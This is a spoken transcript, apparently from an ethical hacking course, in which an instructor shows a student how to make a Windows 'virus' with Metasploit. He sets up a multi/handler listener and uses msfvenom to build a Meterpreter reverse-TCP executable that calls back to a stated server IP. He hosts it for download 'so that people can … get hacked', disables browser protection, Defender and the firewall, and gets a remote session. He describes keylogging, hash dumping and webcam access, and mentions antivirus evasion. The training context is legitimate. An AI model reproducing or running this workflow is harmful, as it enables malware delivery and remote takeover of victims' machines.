Welcome. In this session, we are going to understand about how to create a virus for Windows operating system using Metasploit. So in this session, we are going to start creation of a virus for ethical hacking, penetration testing, and security course. We are going to create a simple virus program for Windows operating system in order to understand how it is made for Windows machines by script kiddies or how Metasploit framework can be used. Followed by, we are going to make a virus which will be antivirus proof. Currently, the default virus which we create from Metasploit is detectable by antivirus mechanisms on machines, but there are certain techniques with which we can encode the virus using alphanumeric encoding functions so that it is not detected by computers, by the client machines. Okay, so we are going to get started with this. I'm going to make use of your PEM file. Yours is vivek.pem, right? I'm going to create the Metasploit from your machine, which means your this IP address. Okay, 3.7.252.210. So I'll go to terminal and I'm going to SSH into your machine using vivek.pem Kali IP address. So I'm here in the Kali server currently. So what do we have to do? Whenever we have to create a remote shell and we want to access the files, it's always a good idea to run it into a web server directory and have the chmod 777 permission so that we can create new files and access those files through a web browser. Okay. So what am I going to do? First of all, I do need to start a service, sudo service Apache 2 start. So with this, my Apache service will be running and I will change my directory to cd/var/worldwideweb/html. So this is a publicly accessible directory. You can quickly see currently there are two files, index.html and indexengines.html. What am I going to do? I'm going to open a new browser and I'm going to open this IP address and I'll show you that your IP address 3.7.252.210 will show me this page, Apache 2 Debian default page. This is the server page where currently the default web page is being displayed. Okay. Now, what am I going to do? I'm going to delete this page and whatever payloads we are going to create and the outcome of those payloads which we are running on different machine, like taking the screenshots and everything, we will be maintaining within this var World Wide Web HTML directory. Okay. So how we are going to do it? So first of all, I'm going to remove these files. Okay. So I have removed the current index.html file. So now you can see that it will show me that it's a blank server. Okay. I will rerun it and just check if it has been, no, it has not been removed. Sudo rm-rf start. Okay. So now the files have been removed. I'm going to run and now you can see that the server currently does not have any file here. Now what am I going to do? After cleaning this server, all my files will be maintained on this server and we will be accessing. Okay. Now what next we do need to do? I want to give permissions to this HTML directory. So currently the permissions to HTML directory is read, write, execute. Only root can access it. Otherwise, other programs can only execute the files, but they cannot create new files. But we want to currently run Metasploit services with the current user privileges. So we want our current user also should be able to access HTML directory with the permission so that it can create new files. And these new files will be the logs which we might be stealing from the remote machine. So let's see how we do it. So we do it by chmod 777 and HTML / an HTML directory. Okay. So I have changed this file to read, write, execute. Okay. And if I do ls-l now, you can see the HTML directory has access to read, write, execute currently. So with any of my current users, I will be able to create any files without root permissions in the current server directory, which is var World Wide Web HTML. Okay. So I'll go to the HTML directory. And now here in the HTML directory, I'm going to get started with the Metasploit framework. So the Metasploit framework can be started using MSF console. MSF console gives you command line access to Metasploit framework. Metasploit framework gives you a list of exploits and payloads. With the exploits, you can exploit the remote machines without giving them a binary payload. But in today's session, we are going to understand the concept of directly giving an executable file, which might be a virus. Once the user runs it, we are going to get the shell. But later we can make use of exploits with which we don't need to give the user a exe file. We can by default identify a vulnerability on a remote machine and exploit that, the server, exploit the client or the victim. Now, but in this case, we are going to keep a simple payload. So we are going to start MSF console. So once I start MSF console, I have to execute the command MSF console. You can see that the Metasploit framework console is running. You can see that it has 2,162 exploits, which means there are 2,162 types of programs which can exploit different kinds of programs. Okay, there are exploits available for operating system exploits. There are exploits available for different softwares which are running on a machine. So various exploits are available. Along with that, we have 592 payloads. Payload is a program which can give you something in return. So when I say that we are going to get access to reverse shell of a remote machine, so reverse shell is one kind of payload. Okay, and there are, other than reverse shell, there are other payloads also available, which is 592 in count. So we are going to use one payload out of these 592 payloads, which belongs to Windows payloads. Okay, so here we are here where we are going to create our virus program, and then we are going to have a listener, which is going to listen how the server is going to be hacked. Okay. Now, so what next am I going to do? I'm going to clear the screen first. Okay. And I'm going to show you certain options, show payloads. Okay. There are various payloads available. So I'm going to execute this command, show payloads. So we can see that there were 592 payloads available, and we have got a list of payloads. Okay. What I want is, I want the payloads of Windows type. Okay. So currently you can see that for Windows, there are various payloads available. So within the payload directory for Windows, for x64 machine, there are various payloads available, like there is a VNC inject WinHTTPS service available. Okay. So once you run, it will give you a virtual network computing VNC based connection will be given to you, where you can control the remote machine. And there are so many Windows payloads available. Okay. So the current which we will be using will be a reverse shell TCP. Okay. So we can use the reverse shell payload also, which will give us access to a command shell, or we can also run a payload which is Metapreter. Metapreter is also a very common way of exploiting the machines. So the benefit of Metapreter is it gives you some n number of commands with which hacking becomes easy. So you can do a lot of things like hacking, key scan. You can run a keylogger on a remote machine. You can access the camera of a remote machine with the Metapreter payloads by executing one single command. So that's why Metapreter is also considered as one of the finest ways of hacking the machines. Okay. So there are two ways of getting the connections. Either we get the TCP connection, or we can get a HTTP reverse shell connection. Okay. So we are going to run, the first one we are going to run is, let's say we are going to run Metapreter Windows reverse TCP. Okay. So here is the payload number 554. So x64 Metapreter reverse TCP, but it says it needs IPv6. I would be working with IPv4 protocol. So I can run this one also, 551 also, reverse shell through an HTTP connection. That is also a good way of hacking it. And other than this, you can see that there are various protocols available. Okay. So Metapreter reverse TCP for reflective injection is available. Reverse TCP for normal connections with SMB exploitation is available. Okay. So there are so many available, and I do need to check how there might be any new changes might be available within these payloads depending on the kind of exploit we are trying to do. So I'm just going to walk through with what all is available. So there are so many with reflective injections. Okay, so here there are so many for IP, TCP. Okay, so what I'll do, I'll try to use one. Windows Metapreter reverse TCP I'm going to use. Windows x64 Metapreter reverse TCP. That's what I'm going to test it here. Okay. So I'm going to use exploit. This is going to be multi/handler. Okay. This is going to be the exploit which is going to receive the connections. Okay. So what I can do is, okay, there are two ways with which we can do is, currently I have starting a listener. This is the steps for writing the listener. Okay. So in the listener, I'm going to set a payload. This is going to be the part of the server side, which is going to listen for the reverse connection. Okay. So as I told you, at first we start a server and then we create a payload, and that payload is connected by the victim machine to the server machine. So initially I'm going to run a server. So I'm going to start a payload, set payload, and I'm going to set it for Windows /x64 /Metapreter /reverse TCP. I'm going to use the reverse TCP payload. Okay. This is the payload which I'm using. Now I can quickly see the options which I need to set for this. So the current selected payload is Windows x64 Metapreter reverse TCP. And I'm going to define a local host where I'm going to listen for a reverse connection. And I want to open a port also. Okay. In your settings, we do need to check, have you opened the port number 4444? So what you need to do, you need to enable firewall so that incoming connections can be accepted. Okay. So what you need to do before we get into this, I want you to share the screen, log into your AWS console, and I'm going to enable the firewall so that we can get the reverse connection from the victims. Okay. I have given you access to share the screen. You can share your screen. Vivek, you can share your screen. Log into console.aws.amazon.com from a browser. Just log into your account. Type in the captcha. Type the captcha again.
Let it open.
Okay. So now what you do on the, you can click on instances on the left hand side. Yeah. Once you click on the instances, you're going to get a list of instances and then you have to scroll down. Now here you can select the instance, the let's test instance. From the left hand side, you have a checkbox. Now go scroll down a little and click on security. Scroll down a little. We have to update the inbound rules. Okay, we have updated the rules. So 120.265.535, we have opened all the ports so that we can test the incoming connections. That is fine. Okay, we can come back to our part. So I'm sharing my screen again. So this is just to check that the firewall on AWS is ready so that the listeners can be, so when we are listening to a connection, we are going to receive that connection properly. So now I'm going to set lhost property, which is going to be the listener, and this is going to be my IP address. So I'm going to set 0.0.0.0. This means I will be listening on all the network interface cards available on AWS server machine. Okay, the hacking server machine. So this is 0.0.0.0 means you can run your listener on all the network interface cards. So the connections coming from the public domain, which means let's say a person is on another network, he's trying to send his reverse shell to your computer, you will be able to access it. Okay, he will be able to give you the shell, and he will be able to give you the shell means the remote computer is going to will be able to connect your machine and you will be able to access the shell. So now you can see that you have set the lhost IP address as 0.0.0.0 and the L port is 4444. Okay, so the port is set by default 4444. You can change the L port also, and you can open any port between 0 to 65,535. Just that it should not be used by any other program. Okay, so if you try to set an L port which any other machine might be with any other program on the machine might be using, so it won't be binded. Okay, so you can change the L port as well. Let's say I can set the L port to 6666. Okay, so once you do that, you can quickly see the options, and within the options you can see that the L port has been changed. Okay, so you can select the L port of your choice, and this is very important because when you will make the virus, you have to define in that payload that the remote computer is going to make a connection to your IP address on this port number 6666. Only then the connection will happen. Okay, so this is very important. So let's say I can get the connection on 4444 as well as on 6666. On any of the ports, we can have the connection. Okay, so I have defined that I am going to listen for x64 Metapreter reverse TCP payload. So I'm going to start the exploit. Okay, so once I start the exploit, you can see that currently I'm listening on port number 6666 on the network on the public IP address of my AWS server. So this means the hacker is ready to accept the shells from the viruses. Okay, now we need to make a virus program also. So for that, what am I going to do? I'm going to create a new terminal. I'm going to access your server, and then I'm going to create one virus program, which I'm going to put into this web servers directory so that people can download from it and can get hacked. Okay, so I'm going to open another terminal. Let's say I'm going to open a new window. with a basic profile. And in this, I'm going to create my payload. Okay. Now let's see. So I will log into the server. Sorry. I will log into my current server, vivek.pem, kali@, and your IP address is 3.7.252.210. Okay. So now again, I have got access to the server. So above there is a listener listening. Now I'm going to make a payload. Okay. And this payload is going to be the virus program. So how am I going to do? So there is a program known as MSF Venom. With this MSF Venom program, what we can do, we can create the payloads directly. Okay. So above, I have made a listener for the payload, but in the below window, I'm creating a payload which a user can download and execute on his machine, and his machine will be exploited. Okay. So I'll show you MSF Venom with the option -H, what all options are available. So what is MSF Venom? MSF Venom is a Metasploit standalone payload generator. So you can generate a payload using MSF Venom. Okay. So how we can do it? So we can call MSF Venom command. We can define using option -P which payload we want to make. So I'm going to define the type of payload which I want to make. Then I'm going to define my local host, what would be the IP address to which the victim computer should connect to once he clicks on the payload. Then I'm going to define the format, that is it an executable type or is it a raw type. So currently I'm making for Windows, so I'm going to make it for the exe type. So by default it is going to be executable type. Okay. And the name of the payload. So there are various other payloads also available. You can use MSF Venom -L option to get a list of the payloads. Okay. So you can quickly see what types of payloads are available and you can use one. But currently, since I have already told you that I will be using for Windows Metapreter, so I'm going to set it from here. So what I'll do, I'm going to use this command MSF Venom, okay, -P payload. So I'm going to create a payload for Windows -P /Windows. Just give me a minute. Windows /x64/Metapreter /reverse_TCP. Okay, this is going to be my payload. I'll do one thing. Let me just clear it once. Okay, and I'm going to use MSF Venom. I'll show you once again. I'm just checking whether he used any / before. So no, it has direct access to the Windows directory. So I'm going to use it like that. So I'm going to call it MSF Venom. -P stands for payload. So I want to select a Windows payload, which would be of x64 type. The payload type is Metapreter, and it is going to create a reverse shell connection, reverse TCP, to an IP address. The IP address would be your IP address. Now I'm going to define the payload which I'm creating right now will be running on a local client machine, which means on a Windows machine. So once the click will be done, it is going to make a connection to an IP address. What should be the IP address? The IP address should be my server's IP address, okay, where I want to receive the connection. So in the payload, we define that the IP address would be 3.7.252.210, and this is the IP address of the hacker machine. Then I'm going to define the port number also, and I will say the port number is going to be 6666. Okay. The format is going to be an exe format. And the output is going to be, let's say I'm going to create a simple program like virus.exe. Okay. So this is what I'm going to make. So once I run it, I'm going to get a payload created with the name virus.exe. Okay. Now you can see that there is a payload created of 7168 bytes with the name virus.exe. And if I refresh the server now, you can see that you have got a 7 KB virus.exe created. Okay. So you can copy this link. Now what we have to do, so we have created the virus using this command. Now we can share the link of that virus. Okay. And here I am going to listen all my reverse shell connections. Okay. So what we can do now, let's say I'll copy the link. So suppose I have given this link to any of my friends. Okay. And I will go to a Windows machine. I will say that you go to the Windows machine and download my virus.exe. So once we click on it, you can see that a virus.exe has been downloaded. Okay. So I just do need to see either what I can do is I can zip it into a self-extracting exe like that. So that can also be done. But currently what is happening, the virus.exe has been created with Metasploit. So somehow I believe this program, Chrome is identifying it. So we should always encode it because once we encode it with Shikata_GANAI or any other encoder, then it becomes quite good and it becomes safe. And I'll show you that method, how we create antivirus proof viruses. So what I'll do is I'll just try to, I will upload it here on Trello for time being. And there might be one more thing. Okay, we'll do one thing. I'll just change the settings for a moment. Okay, I'll just go here. I'll just go to settings and I'll just change my settings for a moment. Okay, so I will be using, let's say for now I'm just using no protection for time being, just to test the software. Okay, now you can see that the program has been downloaded here on the machine, and I'll go to show in folder. And here is the program. Okay. So now you can see that this is my program and currently I have got no connection here. But once I double click, I'm going to get a reverse connection on this multi-handler. Okay. So I'll just show you. So I'll double click on this. Once I double click on this, it is saying, do you want to run the application? I said run. Now you can see that I have got a reverse connection from 112.196.144.102. And you can see that a Metapredator session 1 has been opened between the IP address of the server on port number 66 and the victim machine from his port number 1519. Can you see that? Yes, sir. Okay, so currently I have got all the options to exploit, as in I can get the hash dump of the password database. I can elevate my privileges. I can get the audio output commands. I can perform webcam streaming and a lot of stuff. I can perform key logging. I can put my command into put my virus into a specific process, and can do a lot of other stuff. Okay. So you can see that we have got those connections. Now what I'll do, I'll take you to the background and I'll show you sessions-l. So there is one current connection, which is the Metapreta, which is my machine, which is currently connected. What I want you is you also run this link. So I'm just sharing the link to download this server. I'm sending it to you in chat, the link, and you can share your screen for the time being. Once you're downloading the process, just do share your screen once. Okay, now you 3.7.
Your voice is breaking.
Open 3.7.
Yes, sir. 3.7.
252.210. You can just open it. Okay. So for the timing, change the settings. Later, I will show you how we can make it antivirus proof. But currently, for the testing purposes, go to privacy and security on the left. Go to security, third option, security. Change it to no protection. No protection. There is another option, third option at the bottom, no protection. Turn it off for a moment. Now you go to the site and download it. Okay. Once you click on it, click and run the application. There might be some Windows security might also be running for now. Turn that off also, Defender, for a moment in case if it is possible. You go to Windows Defender and turn the settings off for a moment. Windows Defender firewall, yeah. Turn it off. Go to advanced settings and select the private networks and turn it off. Yeah, public profile and private profile, turn it off. It would be on the right hand side. You have to click, yeah, just maximize the screen. You can select on any of the property, Windows Defender firewall properties. हाँ वहीं पे है, हाँ. अब यहाँ पे जाओ, प्राइवेट प्रोफाइल सेलेक्ट करो, ऑफ कर दो, ऑफ कर दो. फायरवॉल स्टेट पे क्लिक करो, ऑफ. अप्लाई, ओके, अप्लाई भी करना पड़ेगा.